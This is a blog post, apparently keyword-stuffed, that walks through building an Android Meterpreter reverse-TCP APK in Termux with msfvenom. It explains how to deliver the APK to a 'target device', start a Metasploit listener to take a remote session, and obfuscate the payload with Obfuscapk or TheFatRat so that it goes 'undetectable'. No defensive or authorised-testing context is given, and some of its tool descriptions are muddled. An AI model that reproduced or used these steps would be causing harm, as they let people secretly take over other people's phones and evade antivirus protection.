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how to create a payload in termux using metasploit

how to create payload how to make undetectable payload for android how to create payload in metasploit how to create image payload
Minku singh
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 how to create a payload in termux using metasploit

in this post i will show you how to create a payload in termux using metasploit
 and how to create payload in metasploit how to create a payload for android ,how to make payload for android , how to create a payload in metasploit , how to create payload for android ,
how to create android payload

To create a payload in Termux using Metasploit, you can follow these steps:Install Metasploit Framework in Termux using the following command:

pkg install unstable-repo
pkg install metasploit

Once Metasploit is installed, open it using the command msfconsole.
Next, generate a payload using the following command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP address> LPORT=<port> -o <output file path>.apk
Replace <IP address> with your IP address and <port> with the port number you want to use for the connection. Also, replace <output file path> with the desired path and name of the output file.

Transfer the generated APK file to the target device using any preferred method.

Once the APK file is installed on the target device, start a listener in Metasploit using the following command:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <IP address>
set LPORT <port>
Again, replace <IP address> and <port> with the same values used when generating the payload.

Once the listener is active, you should see a session open on the target device, and you can start interacting with it using various Metasploit modules and commands.

how to create a payload in metasploit

Install Metasploit Framework in your system or device.

Open the Metasploit console by typing the command

Type use followed by the exploit you want to use. For example, if you want to create an Android payload, you can use the android/meterpreter/reverse_tcp exploit by typing use android/meterpreter/reverse_tcp.

Set the values for the options required by the exploit. For example, for the android/meterpreter/reverse_tcp exploit, you need to set the LHOST and LPORT options. You can do this by typing set LHOST <your IP address> and set LPORT <desired port number>.

Type generate followed by the output format and file path where you want to save the payload. For example, if you want to create a payload in APK format and save it in the root directory of your system, you can type generate -f apk -o /root/payload.apk.

To make the payload undetectable, you can use an APK obfuscator like Obfuscapk. Here are the steps to make your payload undetectable using Obfuscapk:

Install Obfuscapk in your system or device.

Type obfuscapk followed by the file path of the payload you want to obfuscate. For example, if you want to obfuscate the payload you created earlier, you can type obfuscapk /root/payload.apk.

Choose the obfuscation techniques you want to use by selecting the options provided by Obfuscapk.

Once you have selected the desired obfuscation techniques, type   y   to confirm the obfuscation process.

Wait for the obfuscation process to finish. Once it is done, you will have an undetectable payload that you can use for your purposes.

How to create Image payload for android

To create an image payload for Android, you can use a tool like TheFatRat. Here are the steps to create an image payload using TheFatRat:

Install TheFatRat in your system or device.

Open TheFatRat by typing the command thefatrat.

Choose the option 7) Android followed by the option 1) APK Embed Payload.

Type the file path of the image you want to use as the payload, or use the default image provided by TheFatRat.

Type the desired IP address and port number for the payload to connect to.

Wait for TheFatRat to create the payload. Once it is done, you will have an APK file that contains the image payload.

About the Author

Minku singh
Hello my name is Minku singh and i am a part time blogger since 2020.Web devloper minku singh. web dev minku . Minku Singh

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